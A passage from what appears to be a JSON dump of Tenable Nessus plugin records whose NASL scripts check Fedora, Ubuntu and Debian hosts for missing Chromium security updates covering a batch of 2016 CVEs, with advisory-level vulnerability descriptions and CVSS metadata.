FEDORA-2016-a815b7bf5d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95903);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\", \"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"FEDORA\", value:\"2016-a815b7bf5d\");\n\n script_name(english:\"Fedora 25 : chromium (2016-a815b7bf5d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Chromium 55. \n\nSecurity fix for CVE-2016-5199, CVE-2016-5200, CVE-2016-5201,\nCVE-2016-5202, CVE-2016-9651, CVE-2016-5208, CVE-2016-5207,\nCVE-2016-5206, CVE-2016-5205, CVE-2016-5204, CVE-2016-5209,\nCVE-2016-5203, CVE-2016-5210, CVE-2016-5212, CVE-2016-5211,\nCVE-2016-5213, CVE-2016-5214, CVE-2016-5216, CVE-2016-5215,\nCVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221,\nCVE-2016-5220, CVE-2016-5222, CVE-2016-9650, CVE-2016-5223,\nCVE-2016-5226, CVE-2016-5225, CVE-2016-5224, CVE-2016-9652\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-a815b7bf5d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"chromium-55.0.2883.87-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-13T15:49:46", "description": "Update to Chromium 55. \n\nSecurity fix for CVE-2016-5199, CVE-2016-5200, CVE-2016-5201, CVE-2016-5202, CVE-2016-9651, CVE-2016-5208, CVE-2016-5207, CVE-2016-5206, CVE-2016-5205, CVE-2016-5204, CVE-2016-5209, CVE-2016-5203, CVE-2016-5210, CVE-2016-5212, CVE-2016-5211, CVE-2016-5213, CVE-2016-5214, CVE-2016-5216, CVE-2016-5215, CVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221, CVE-2016-5220, CVE-2016-5222, CVE-2016-9650, CVE-2016-5223, CVE-2016-5226, CVE-2016-5225, CVE-2016-5224, CVE-2016-9652\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Fedora 24 : chromium (2016-e0e1cb2b2b)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-E0E1CB2B2B.NASL", "href": "https://www.tenable.com/plugins/nessus/95906", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-e0e1cb2b2b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95906);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\", \"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"FEDORA\", value:\"2016-e0e1cb2b2b\");\n\n script_name(english:\"Fedora 24 : chromium (2016-e0e1cb2b2b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Chromium 55. \n\nSecurity fix for CVE-2016-5199, CVE-2016-5200, CVE-2016-5201,\nCVE-2016-5202, CVE-2016-9651, CVE-2016-5208, CVE-2016-5207,\nCVE-2016-5206, CVE-2016-5205, CVE-2016-5204, CVE-2016-5209,\nCVE-2016-5203, CVE-2016-5210, CVE-2016-5212, CVE-2016-5211,\nCVE-2016-5213, CVE-2016-5214, CVE-2016-5216, CVE-2016-5215,\nCVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221,\nCVE-2016-5220, CVE-2016-5222, CVE-2016-9650, CVE-2016-5223,\nCVE-2016-5226, CVE-2016-5225, CVE-2016-5224, CVE-2016-9652\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-e0e1cb2b2b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"chromium-55.0.2883.87-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-13T15:49:52", "description": "Multiple vulnerabilities were discovered in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to conduct cross-site scripting (XSS) attacks, read uninitialized memory, obtain sensitive information, spoof the webview URL, bypass same origin restrictions, cause a denial of service via application crash, or execute arbitrary code.\n(CVE-2016-5204, CVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5209, CVE-2016-5212, CVE-2016-5215, CVE-2016-5222, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226, CVE-2016-9650, CVE-2016-9652)\n\nMultiple vulnerabilities were discovered in V8. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to obtain sensitive information, cause a denial of service via application crash, or execute arbitrary code.\n(CVE-2016-5213, CVE-2016-5219, CVE-2016-9651)\n\nAn integer overflow was discovered in ANGLE. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-5221).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-09T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : oxide-qt vulnerabilities (USN-3153-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5215", "CVE-2016-5219", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2019-11-22T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10"], "id": "UBUNTU_USN-3153-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95661", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3153-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95661);\n script_version(\"2.16\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5215\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"USN\", value:\"3153-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : oxide-qt vulnerabilities (USN-3153-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to conduct cross-site scripting (XSS)\nattacks, read uninitialized memory, obtain sensitive information,\nspoof the webview URL, bypass same origin restrictions, cause a denial\nof service via application crash, or execute arbitrary code.\n(CVE-2016-5204, CVE-2016-5205, CVE-2016-5207, CVE-2016-5208,\nCVE-2016-5209, CVE-2016-5212, CVE-2016-5215, CVE-2016-5222,\nCVE-2016-5224, CVE-2016-5225, CVE-2016-5226, CVE-2016-9650,\nCVE-2016-9652)\n\nMultiple vulnerabilities were discovered in V8. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit these to obtain sensitive information, cause a\ndenial of service via application crash, or execute arbitrary code.\n(CVE-2016-5213, CVE-2016-5219, CVE-2016-9651)\n\nAn integer overflow was discovered in ANGLE. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via application crash, or\nexecute arbitrary code. (CVE-2016-5221).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3153-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected liboxideqtcore0 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.19.4-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.19.4-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"liboxideqtcore0\", pkgver:\"1.19.4-0ubuntu0.16.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:38:35", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2016-5181 A cross-site scripting issue was discovered.\n\n - CVE-2016-5182 Giwan Go discovered a heap overflow issue.\n\n - CVE-2016-5183 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2016-5184 Another use-after-free issue was discovered in the pdfium library.\n\n - CVE-2016-5185 cloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\n - CVE-2016-5186 Abdulrahman Alqabandi discovered an out-of-bounds read issue in the developer tools.\n\n - CVE-2016-5187 Luan Herrera discovered a URL spoofing issue.\n\n - CVE-2016-5188 Luan Herrera discovered that some drop down menus can be used to hide parts of the user interface.\n\n - CVE-2016-5189 xisigr discovered a URL spoofing issue.\n\n - CVE-2016-5190 Atte Kettunen discovered a use-after-free issue.\n\n - CVE-2016-5191 Gareth Hughes discovered a cross-site scripting issue.\n\n - CVE-2016-5192 haojunhou@gmail.com discovered a same-origin bypass.\n\n - CVE-2016-5193 Yuyang Zhou discovered a way to pop open a new window.\n\n - CVE-2016-5194 The chrome development team found and fixed various issues during internal auditing.\n\n - CVE-2016-5198 Tencent Keen Security Lab discovered an out-of-bounds memory access issue in the v8 JavaScript library.\n\n - CVE-2016-5199 A heap corruption issue was discovered in the ffmpeg library.\n\n - CVE-2016-5200 Choongwoo Han discovered an out-of-bounds memory access issue in the v8 JavaScript library.\n\n - CVE-2016-5201 Rob Wu discovered an information leak.\n\n - CVE-2016-5202 The chrome development team found and fixed various issues during internal auditing.\n\n - CVE-2016-5203 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2016-5204 Mariusz Mlynski discovered a cross-site scripting issue in SVG image handling.\n\n - CVE-2016-5205 A cross-site scripting issue was discovered.\n\n - CVE-2016-5206 Rob Wu discovered a same-origin bypass in the pdfium library.\n\n - CVE-2016-5207 Mariusz Mlynski discovered a cross-site scripting issue.\n\n - CVE-2016-5208 Mariusz Mlynski discovered another cross-site scripting issue.\n\n - CVE-2016-5209 Giwan Go discovered an out-of-bounds write issue in Blink/Webkit.\n\n - CVE-2016-5210 Ke Liu discovered an out-of-bounds write in the pdfium library.\n\n - CVE-2016-5211 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2016-5212 Khalil Zhani discovered an information disclosure issue in the developer tools.\n\n - CVE-2016-5213 Khalil Zhani discovered a use-after-free issue in the v8 JavaScript library.\n\n - CVE-2016-5214 Jonathan Birch discovered a file download protection bypass.\n\n - CVE-2016-5215 Looben Yang discovered a use-after-free issue.\n\n - CVE-2016-5216 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2016-5217 Rob Wu discovered a condition where data was not validated by the pdfium library.\n\n - CVE-2016-5218 Abdulrahman Alqabandi discovered a URL spoofing issue.\n\n - CVE-2016-5219 Rob Wu discovered a use-after-free issue in the v8 JavaScript library.\n\n - CVE-2016-5220 Rob Wu discovered a way to access files on the local system.\n\n - CVE-2016-5221 Tim Becker discovered an integer overflow issue in the angle library.\n\n - CVE-2016-5222 xisigr discovered a URL spoofing issue.\n\n - CVE-2016-5223 Hwiwon Lee discovered an integer overflow issue in the pdfium library.\n\n - CVE-2016-5224 Roeland Krak discovered a same-origin bypass in SVG image handling.\n\n - CVE-2016-5225 Scott Helme discovered a Content Security Protection bypass.\n\n - CVE-2016-5226 Jun Kokatsu discovered a cross-scripting issue.\n\n - CVE-2016-9650 Jakub Zoczek discovered a Content Security Protection information disclosure.\n\n - CVE-2016-9651 Guang Gong discovered a way to access private data in the v8 JavaScript library.\n\n - CVE-2016-9652 The chrome development team found and fixed various issues during internal auditing.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-12T00:00:00", "type": "nessus", "title": "Debian DSA-3731-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194", "CVE-2016-5198", "CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3731.NASL", "href": "https://www.tenable.com/plugins/nessus/95667", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3731. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95667);\n script_version(\"3.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2016-5181\",\n \"CVE-2016-5182\",\n \"CVE-2016-5183\",\n \"CVE-2016-5184\",\n \"CVE-2016-5185\",\n \"CVE-2016-5186\",\n \"CVE-2016-5187\",\n \"CVE-2016-5188\",\n \"CVE-2016-5189\",\n \"CVE-2016-5190\",\n \"CVE-2016-5191\",\n \"CVE-2016-5192\",\n \"CVE-2016-5193\",\n \"CVE-2016-5194\",\n \"CVE-2016-5198\",\n \"CVE-2016-5199\",\n \"CVE-2016-5200\",\n \"CVE-2016-5201\",\n \"CVE-2016-5202\",\n \"CVE-2016-5203\",\n \"CVE-2016-5204\",\n \"CVE-2016-5205\",\n \"CVE-2016-5206\",\n \"CVE-2016-5207\",\n \"CVE-2016-5208\",\n \"CVE-2016-5209\",\n \"CVE-2016-5210\",\n \"CVE-2016-5211\",\n \"CVE-2016-5212\",\n \"CVE-2016-5213\",\n \"CVE-2016-5214\",\n \"CVE-2016-5215\",\n \"CVE-2016-5216\",\n \"CVE-2016-5217\",\n \"CVE-2016-5218\",\n \"CVE-2016-5219\",\n \"CVE-2016-5220\",\n \"CVE-2016-5221\",\n \"CVE-2016-5222\",\n \"CVE-2016-5223\",\n \"CVE-2016-5224\",\n \"CVE-2016-5225\",\n \"CVE-2016-5226\",\n \"CVE-2016-9650\",\n \"CVE-2016-9651\",\n \"CVE-2016-9652\"\n );\n script_xref(name:\"DSA\", value:\"3731\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Debian DSA-3731-1 : chromium-browser - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - 